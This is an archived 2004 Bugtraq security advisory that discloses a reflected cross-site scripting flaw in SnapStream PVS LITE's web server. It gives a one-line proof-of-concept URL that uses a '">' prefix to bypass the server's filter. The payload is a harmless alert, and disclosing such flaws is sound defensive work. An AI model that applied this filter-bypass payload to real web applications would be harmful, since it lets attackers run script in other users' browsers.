SnapStream PVS LITE Cross Site Scripting Vulnerabillity

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: SnapStream PVS LITE Cross Site Scripting Vulnerabillity
From: "Rafel Ivgi" <theinsider@xxxxxxxxxx>
Date: Wed, 7 Jan 2004 01:02:55 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: "Rafel Ivgi" <theinsider@xxxxxxxxxx>

#######################################################################

Application:    SnapStream PVS
Vendor       :    http://www.snapstream.com
Versions:        LITE
Platforms:       Windows/Unix
Bug:               Cross Site Scripting Vulnerabillity
Risk:              Low
Exploitation:    Remote with browser
Date:               6 Jan 2004
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@xxxxxxxx
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============


SnapStream PVS is a Personal Video Station software. It allows the user to
remotely
 schedule recordings and playing of Tv shows using video tapes and cable TV.

#######################################################################

======
2) Bug
======

When the webserver hosting  SnapStream PVS LITE recieves a
'GET /?<script>alert('XSS')</script>' its ignores it, the data gets filtered
as it should.
But when it recieves a 'GET /?"><script>alert('XSS')</script>' the filters
are bypassed
and XSS appears and the server allows an attacker to inject & execute
scripts.

#######################################################################

===========
3) The Code
===========

http://<host>/?"><script>alert('XSS')</script>

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Prev by Date: [SECURITY] [DSA 415-1] New zebra packages fix denial of service
Next by Date: [slackware-security] Kernel security update (SSA:2004-006-01)
Previous by thread: [SECURITY] [DSA 415-1] New zebra packages fix denial of service
Next by thread: [slackware-security] Kernel security update (SSA:2004-006-01)
Index(es):
- Date
- Thread